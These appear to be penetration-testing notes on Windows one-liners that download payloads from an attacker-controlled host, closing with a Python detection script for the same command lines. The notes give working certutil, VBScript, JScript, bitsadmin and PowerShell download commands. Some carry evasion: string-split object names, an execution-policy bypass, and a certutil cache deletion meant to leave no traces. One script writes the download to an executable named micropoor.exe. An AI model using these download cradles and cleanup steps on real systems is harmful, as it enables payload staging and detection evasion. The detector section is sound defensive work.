Penetration Testing Notes 5: One-Liner Payload Download

certutil

Certutil.exe is a command-line program installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs and certificate chains.

Download

By default the downloaded file is saved as a .bin file, which does not affect execution:
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt

Clear the cache

To avoid leaving traces, remove the entry from the certutil URL cache afterwards:
certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt delete

vbs

Save the following as downfile.vbs:

set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2

Or create it from the command line (the original note repeated "set a=downfile.vbs" at the start of the echo, which would break the script; the line below writes only the script body):

echo set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp"):w.open "get",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs

Run it from the command line (first argument is the URL, second is the destination path):

cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt

Parameterized download (longer VBScript variant with a status check)

strFileURL = "http://192.168.1.115/robots.txt"
strHDLocation = "c:\test\logo.txt"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, False
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1                       ' adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    ' SaveToFile defaults to adSaveCreateNotExist, so delete any existing file first
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If
Set objXMLHTTP = Nothing

js

Read (print the response to the console):

cscript /nologo downfile.js http://192.168.1.115/robots.txt

Code (downfile.js):

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);   // URL is the first argument
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);

Write (save the response body to a file):

cscript /nologo downfile2.js http://192.168.1.115/robots.txt

Code (downfile2.js):

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);   // URL is the first argument
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");               // "var" was missing in the original
BinStream.Type = 1;                                              // adTypeBinary
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe", 2);                        // output name is hard-coded; 2 = adSaveCreateOverWrite
BinStream.Close();

bitsadmin

bitsadmin is built into Windows 7 and later. It can download files over an unstable network, retrying automatically on error, and performs well in complex network environments.

bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

Note that bitsadmin requires the server to support the Range header.
For very large files the job priority needs to be raised. After issuing the download command above, run:

bitsadmin /setpriority down foreground

If the file is between 1 and 5 MB you will want to check progress from time to time; bitsadmin also supports a progress display:

bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt

The latter form does not support HTTPS.

powershell

PowerShell has been built in since Windows 7: Windows 7 ships with PowerShell 2.0 and Windows 8 with PowerShell 3.0.

Check the version:

powershell $PSVersionTable

Script (down.ps1):

$Urls = @()
$Urls += "http://192.168.1.115/robots.txt"
$OutPath = "E:\PDF\"
ForEach ($item in $Urls) {
    # output file name is the last path segment of the URL
    $file = $OutPath + ($item).split('/')[-1]
    (New-Object System.Net.WebClient).DownloadFile($item, $file)
}

powershell C:\inetpub\down.ps1

Note: the absolute path to the script is required.

Since PowerShell 3.0 a wget-style cmdlet is available, namely Invoke-WebRequest:

$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"

One-liner (practical):

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
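From the defender's side, every technique in these notes leaves a distinctive process command line (certutil -urlcache, bitsadmin /transfer, WebClient.DownloadFile, Invoke-WebRequest -OutFile, cscript with a URL argument, echo-redirect script drops). The following Python detector is an added example, not part of the original notes; it runs a small rule set over constructed Sysmon-style process-creation records whose command lines mirror the ones above, plus one benign certutil call that must not fire.

```python
import re

# Detection rules for the download one-liners covered in these notes. Each pair is
# (technique label, regex over the process command line). Patterns are deliberately
# loose: case-insensitive and tolerant of extra switches between the key tokens.
RULES = [
    ("certutil urlcache download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*-f\b.*https?://", re.I)),
    ("bitsadmin transfer",
     re.compile(r"bitsadmin(\.exe)?\s.*/transfer\b.*https?://", re.I)),
    ("powershell WebClient.DownloadFile",
     re.compile(r"system\.net\.webclient\b.*\.downloadfile\(", re.I)),
    ("powershell Invoke-WebRequest -OutFile",
     re.compile(r"invoke-webrequest\b.*-outfile\b", re.I)),
    ("script host (cscript/wscript) given a URL",
     re.compile(r"[wc]script(\.exe)?\s.*\.(vbs|js)\b.*https?://", re.I)),
    ("script dropped with echo redirect",
     re.compile(r"\becho\b.*>>?\s*\S+\.(vbs|js)\b", re.I)),
]

# Constructed process-creation records (Sysmon Event ID 1 style fields); the
# command lines mirror the ones in these notes, plus one benign certutil call.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://192.168.1.115/robots.txt"},
    {"image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r'bitsadmin /transfer down /download /priority normal "http://192.168.1.115/robots.txt" E:\PDF\robots.txt'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')"},
    {"image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript downfile.vbs http://192.168.1.115/robots.txt C:\Inetpub\b.txt"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c echo set a=createobject("adod"+"b.stream"):set w=createobject("micro"+"soft.xmlhttp") >> downfile.vbs'},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Windows\notepad.exe SHA256"},  # benign: no hit
]


def classify(cmdline):
    """Return the labels of every rule whose pattern matches this command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Run every rule over each record; return (image, label) pairs for the hits."""
    return [(ev["image"], label) for ev in events for label in classify(ev["cmdline"])]


if __name__ == "__main__":
    for image, label in scan(SAMPLE_EVENTS):
        print(f"{label:45s} <- {image}")
```

The string-splitting seen in the VBScript ("adod"+"b.stream") never reaches the process command line when the script is run from a file, so the cscript rule keys on the interpreter plus a URL argument rather than on script contents; pairing these rules with the certutil URL cache and BITS job logs gives a second signal when the command line itself is not recorded.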